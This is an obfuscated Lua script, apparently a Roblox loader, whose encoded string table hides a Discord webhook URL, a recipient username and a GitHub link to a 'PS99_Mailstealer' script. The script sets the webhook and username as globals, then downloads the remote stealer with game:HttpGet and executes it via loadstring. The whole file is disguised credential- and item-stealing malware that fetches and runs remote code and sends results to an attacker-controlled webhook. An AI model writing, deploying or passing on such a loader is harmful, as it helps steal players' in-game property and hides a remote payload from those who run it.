--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v30,16));if v19 then local v127=0;local v128;while true do if (v127==0) then v128=v5(v87,v19);v19=nil;v127=1;end if (v127==1) then return v128;end end else return v87;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/((5 -(1 + 2))^(v32-(2 -1))))%((1 + (958 -(892 + 65)))^(((v33-1) -(v32-(878 -(282 + 595)))) + (1638 -((1640 -(32 + 85)) + 114)))) ;return v88-(v88%(1 -0)) ;else local v89=0 -0 ;local v90;while true do if (v89==(619 -(555 + 64))) then v90=(933 -(857 + 73 + 1))^(v32-((1356 -787) -(367 + 201))) ;return (((v31%(v90 + v90))>=v90) and (4 -3)) or (927 -(214 + (1317 -604))) ;end end end end local function v21() local v34=0 -0 ;local v35;while true do if (v34==(350 -(87 + 263))) then v35=v1(v16,v18,v18);v18=v18 + (181 -(67 + 113)) ;v34=1 + 0 ;end if (v34==((2 + 0) -1)) then return v35;end end end local function v22() local v36=0 -(0 -0) ;local v37;local v38;while true do if (v36==(953 -(802 + 150))) then return (v38 * 256) + v37 ;end if (v36==((0 + 0) -0)) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + 2 + 0 ;v36=998 -(915 + (107 -25)) ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (1190 -(1069 + (209 -91))) );v18=v18 + 4 + 0 ;return (v42 * (38062656 -(21286231 -(368 + 423)))) + (v41 * (143357 -77821)) + (v40 * ((141 -96) + 211)) + v39 ;end local function v24() local v43=v23();local v44=v23();local v45=19 -(10 + 8) ;local v46=(v20(v44,3 -2 ,462 -(416 + 26) ) * ((6 -4)^32)) + v43 ;local v47=v20(v44,10 + 11 ,54 -23 );local v48=((v20(v44,78 -46 )==(439 -(8 + 137 + 293))) and  -(431 -(44 + 137 + 249))) or (1487 -(998 + 488)) ;if (v47==(0 + 0)) then if (v46==(0 + 0)) then return v48 * (772 -(201 + (1456 -(261 + 624)))) ;else local v111=1138 -((206 -90) + 1022) ;while true do if (v111==0) then v47=4 -3 ;v45=0;break;end end end elseif (v47==(1202 + 845)) then return ((v46==0) and (v48 * (1/(0 -(1080 -(1020 + 60)))))) or (v48 * NaN) ;end return v8(v48,v47-(3632 -2609) ) * (v45 + (v46/((861 -(814 + 45))^52))) ;end local function v25(v49) local v50=0 -0 ;local v51;local v52;while true do if (v50==(1423 -(630 + 793))) then v51=nil;if  not v49 then local v118=0 -(0 -0) ;while true do if (v118==(0 -(0 -0))) then v49=v23();if (v49==(0 + 0)) then return "";end break;end end end v50=(1757 -(376 + 325)) -(87 + 968) ;end if (v50==(13 -10)) then return v6(v52);end if (v50==(6 -4)) then v52={};for v112=1748 -(760 + 987) , #v51 do v52[v112]=v2(v1(v3(v51,v112,v112)));end v50=1916 -(1789 + 124) ;end if (v50==(2 -1)) then v51=v3(v16,v18,(v18 + v49) -(767 -(745 + (1838 -(1703 + 114)))) );v18=v18 + v49 ;v50=1 + 0 + 1 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0 -0 ;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do if (v91~= #"}") then else if (v92== #".") then v93=(function() return v94()~=(1274 -(388 + 886)) ;end)();elseif (v92==2) then v93=(function() return v95();end)();elseif (v92~= #"xxx") then else v93=(function() return v96();end)();end v97[v98]=(function() return v93;end)();break;end if (v91==0) then local v120=(function() return 0 -0 ;end)();local v121=(function() return;end)();while true do if (v120==(0 + 0)) then v121=(function() return 0;end)();while true do if (v121==(561 -(306 + 254))) then v91=(function() return  #"<";end)();break;end if (0==v121) then v92=(function() return v94();end)();v93=(function() return nil;end)();v121=(function() return 1;end)();end end break;end end end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v54=(function() return function(v99,v100,v101) local v102=(function() return 0 + 0 ;end)();local v103=(function() return;end)();while true do if (v102==0) then v103=(function() return 0;end)();while true do if (0==v103) then local v129=(function() return 0;end)();while true do if (v129==(0 -0)) then v99[v100-#"." ]=(function() return v101();end)();return v99,v100,v101;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #".",v59 do FlatIdent_8D83D,Type,Cons,v21,v24,v25,v60,v68=(function() return v53(FlatIdent_8D83D,Type,Cons,v21,v24,v25,v60,v68);end)();end v58[ #"gha"]=(function() return v21();end)();for v69= #"/",v23() do local v70=(function() return v21();end)();if (v20(v70, #"\\", #".")==(1467 -(899 + 568))) then local v106=(function() return 0;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if ((2 + 0)==v106) then while true do if (v107==(4 -2)) then local v130=(function() return 0;end)();local v131=(function() return;end)();while true do if (0==v130) then v131=(function() return 0;end)();while true do if (v131==1) then v107=(function() return  #"gha";end)();break;end if (v131==0) then if (v20(v109, #"]", #"|")~= #".") then else v110[605 -(268 + 335) ]=(function() return v60[v110[292 -(60 + 230) ]];end)();end if (v20(v109,574 -(426 + 146) ,1 + 1 )== #"[") then v110[ #"xnx"]=(function() return v60[v110[ #"gha"]];end)();end v131=(function() return 1;end)();end end break;end end end if (v107==(1456 -(282 + 1174))) then local v132=(function() return 0;end)();local v133=(function() return;end)();while true do if (v132~=0) then else v133=(function() return 0;end)();while true do if (0~=v133) then else v108=(function() return v20(v70,2, #"xnx");end)();v109=(function() return v20(v70, #"0313",817 -(569 + 242) );end)();v133=(function() return 1;end)();end if (v133==(2 -1)) then v107=(function() return  #",";end)();break;end end break;end end end if (v107~= #".") then else local v134=(function() return 0 + 0 ;end)();local v135=(function() return;end)();while true do if ((1024 -(706 + 318))~=v134) then else v135=(function() return 1251 -(721 + 530) ;end)();while true do if (v135~=1) then else v107=(function() return 2;end)();break;end if (v135==(1271 -(945 + 326))) then v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==(0 + 0)) then local v213=(function() return 700 -(271 + 429) ;end)();while true do if (v213==0) then v110[ #"nil"]=(function() return v22();end)();v110[ #"0313"]=(function() return v22();end)();break;end end elseif (v108== #"|") then v110[ #"91("]=(function() return v23();end)();elseif (v108==2) then v110[ #"91("]=(function() return v23() -(2^16) ;end)();elseif (v108~= #"19(") then else local v221=(function() return 0;end)();local v222=(function() return;end)();while true do if (v221==0) then v222=(function() return 0 + 0 ;end)();while true do if (0==v222) then v110[ #"-19"]=(function() return v23() -((1502 -(1408 + 92))^(1102 -(461 + 625))) ;end)();v110[ #"?id="]=(function() return v22();end)();break;end end break;end end end v135=(function() return 1289 -(993 + 295) ;end)();end end break;end end end if (v107== #"xnx") then if (v20(v109, #"-19", #"19(")~= #"[") then else v110[ #"http"]=(function() return v60[v110[ #".dev"]];end)();end v55[v69]=(function() return v110;end)();break;end end break;end if (1==v106) then local v124=(function() return 0 + 0 ;end)();while true do if ((1172 -(418 + 753))~=v124) then else v106=(function() return 1 + 1 ;end)();break;end if (v124~=0) then else v109=(function() return nil;end)();v110=(function() return nil;end)();v124=(function() return 1 + 0 ;end)();end end end if (v106==(0 + 0)) then local v125=(function() return 0;end)();local v126=(function() return;end)();while true do if (v125==0) then v126=(function() return 0;end)();while true do if (v126==0) then v107=(function() return 0;end)();v108=(function() return nil;end)();v126=(function() return 1;end)();end if (1==v126) then v106=(function() return 1 + 0 ;end)();break;end end break;end end end end end end for v71= #"{",v23() do v56,v71,v28=(function() return v54(v56,v71,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1 + 0 ];local v66=v62[531 -(406 + 123) ];local v67=v62[1936 -(565 + 1368) ];return function(...) local v72=v65;local v73=v66;local v74=v67;local v75=v27;local v76=1770 -((2810 -(810 + 251)) + 20) ;local v77= -(1662 -(1477 + 184));local v78={};local v79={...};local v80=v12("#",...) -(1 + 0 + 0) ;local v81={};local v82={};for v104=1322 -(1249 + 73) ,v80 do if (v104>=v74) then v78[v104-v74 ]=v79[v104 + 1 + 0 + 0 ];else v82[v104]=v79[v104 + ((1034 + 112) -(466 + 679)) ];end end local v83=(v80-v74) + (2 -1) ;local v84;local v85;while true do local v105=0 -0 ;while true do if ((3595<4902) and (v105==(1901 -(106 + (2327 -(43 + 490)))))) then if (v85<=(2 + (736 -(711 + 22)))) then if (v85<=(1 + 1)) then if ((v85<=(1125 -(936 + 189))) or (3852==293)) then v82[v84[5 -3 ]]=v84[7 -4 ]~=0 ;elseif ((v85==(115 -(4 + 110))) or (1559==4588)) then v82[v84[586 -(57 + 527) ]]();else local v148=1427 -((158 -117) + 1386) ;local v149;local v150;while true do if ((267 -(176 + 91))==v148) then v149=v84[4 -2 ];v150=v82[v84[4 -1 ]];v148=104 -((876 -(240 + 619)) + 86) ;end if (v148==(1 + 0)) then v82[v149 + (1 -0) ]=v150;v82[v149]=v150[v84[14 -10 ]];break;end end end elseif (v85<=(10 -7)) then local v140=v84[1020 -(697 + 321) ];local v141,v142=v75(v82[v140](v13(v82,v140 + ((1 + 1) -1) ,v84[(268 -99) -(9 + 113 + 44) ])));v77=(v142 + v140) -(1 -0) ;local v143=0 -0 ;for v146=v140,v77 do local v147=0 + (1744 -(1344 + 400)) ;while true do if ((0 + 0)==v147) then v143=v143 + (406 -(255 + 150)) + 0 ;v82[v146]=v141[v143];break;end end end elseif ((v85==(7 -3)) or (4484==788)) then v82[v84[(53 + 14) -(30 + 35) ]]=v84[2 + 1 + 0 ];else local v153=1189 -((1918 -1469) + 740) ;local v154;local v155;local v156;local v157;local v158;while true do if (v153==(1264 -(1043 + 214))) then v84=v72[v76];v158=v84[7 -5 ];v82[v158]=v82[v158](v13(v82,v158 + (1213 -(323 + 889)) ,v77));v76=v76 + 1 + (0 -0) ;v153=21 -(1752 -(404 + 1335)) ;end if (((992 -(183 + 223)) -(361 + (265 -46)))==v153) then v77=(v156 + v158) -(321 -(53 + 267)) ;v154=0 + 0 ;for v214=v158,v77 do v154=v154 + 1 ;v82[v214]=v155[v154];end v76=v76 + (414 -(15 + 398)) ;v153=989 -(18 + 964) ;end if (v153==(3 -2)) then v64[v84[8 -5 ]]=v82[v84[2 + 0 + 0 ]];v76=v76 + 1 + 0 ;v84=v72[v76];v82[v84[852 -(20 + 830) ]]=v64[v84[3 + 0 + 0 ]];v153=1692 -(1121 + 569) ;end if (v153==(129 -(116 + 10))) then v84=v72[v76];v158=v84[685 -((820 -(10 + 327)) + 200) ];v157=v82[v84[1 + 2 ]];v82[v158 + ((2 + 0) -1) ]=v157;v153=4 -(338 -(118 + 220)) ;end if ((743 -(542 + 196))==v153) then v76=v76 + (1 -(0 + 0)) ;v84=v72[v76];v158=v84[767 -(468 + 297) ];v155,v156=v75(v82[v158](v13(v82,v158 + 1 + 0 ,v84[2 + 1 ])));v153=3 + 3 ;end if (v153==(4 -2)) then v76=v76 + (2 -1) ;v84=v72[v76];v82[v84[1553 -(1126 + 425) ]]=v64[v84[(857 -(108 + 341)) -(118 + 287) ]];v76=v76 + (3 -(1 + 1)) ;v153=1124 -(118 + 1003) ;end if (v153==(21 -12)) then v76=v84[3];break;end if ((4568>=3907) and (v153==(0 -(0 -0)))) then v154=nil;v155,v156=nil;v157=nil;v158=nil;v153=378 -(142 + 235) ;end if ((1246<3470) and (v153==(10 -6))) then v82[v158]=v157[v84[18 -14 ]];v76=v76 + 1 ;v84=v72[v76];v82[v84[1 + 1 ]]=v84[3];v153=3 + 2 ;end if (v153==(11 -3)) then v84=v72[v76];v82[v84[979 -(553 + 424) ]]();v76=v76 + (1 -0) ;v84=v72[v76];v153=9;end end end elseif ((4068>=972) and (v85<=(8 + (1493 -(711 + 782))))) then if (v85<=(6 + 0)) then v64[v84[2 + 1 ]]=v82[v84[1 + (1 -0) ]];elseif (v85>((473 -(270 + 199)) + 3)) then local v159=0 -(0 + 0) ;while true do if (v159==2) then v64[v84[7 -4 ]]=v82[v84[4 -2 ]];v76=v76 + 1 + 0 ;v84=v72[v76];v159=3;end if (v159==(0 -0)) then v64[v84[852 -(254 + 595) ]]=v82[v84[755 -(239 + 514) ]];v76=v76 + ((1820 -(580 + 1239)) -0) ;v84=v72[v76];v159=1 + 0 ;end if ((493<3893) and (v159==(1330 -(797 + 532)))) then v82[v84[2 + 0 ]]=v84[(5 -3) + 1 ]~=(0 -0) ;v76=v76 + (1203 -(373 + 829)) ;v84=v72[v76];v159=733 -(476 + 255) ;end if ((v159==(1134 -(369 + 761))) or (1473>=3332)) then v76=v84[2 + 1 ];break;end if (v159==((5 + 0) -2)) then v82[v84[(1 + 2) -(1 + 0) ]]=v84[241 -(64 + 174) ];v76=v76 + 1 + 0 ;v84=v72[v76];v159=4;end end else v76=v84[3 -0 ];end elseif ((v85<=(346 -(144 + (501 -309)))) or (4051<=1157)) then if ((604<2881) and (v85==(2 + 5 + 2))) then v82[v84[1888 -(927 + 959) ]]=v64[v84[219 -(42 + 174) ]];else do return;end end elseif ((v85==(9 + 2)) or (900==3377)) then local v163=0 + (1167 -(645 + 522)) ;local v164;while true do if (v163==(0 + (1790 -(1010 + 780)))) then v164=v84[1506 -(363 + 1141) ];v82[v164]=v82[v164](v13(v82,v164 + (1581 -(1183 + 397)) ,v77));break;end end elseif ((4459>591) and (v82[v84[5 -3 ]]==v84[3 + 1 ])) then v76=v76 + 1 + 0 ;else v76=v84[1978 -(1913 + 62) ];end v76=v76 + 1 ;break;end if (v105==(0 + 0)) then v84=v72[v76];v85=v84[1];v105=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0B3Q00028Q00026Q00F03F03073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F3133303Q3536313932313933353438332Q382F3578624475516959516F68426E4F6B424E62777131727A6F3345316870536F436E386B4F39554851652Q4D524C6A65546F52754C43454D4575713948325047797A5F5973030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034D3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4B692Q75502F50532Q395F4D61696C737465616C65722F6D61696E2F4D61696C537465616C65722E6C756103083Q00557365726E616D65030E3Q006173746570696E7468657061726B030A3Q004C6F61645363722Q656E00163Q0012043Q00013Q00260C3Q000D000100020004073Q000D0001001204000100043Q001205000100033Q00122Q000100053Q00122Q000200063Q00202Q00020002000700122Q000400086Q000200046Q00013Q00024Q00010001000100044Q0015000100260C3Q0001000100010004073Q000100010012040001000A3Q001208000100096Q000100013Q00122Q0001000B3Q00124Q00023Q00044Q000100012Q000A3Q00017Q00",v9(),...);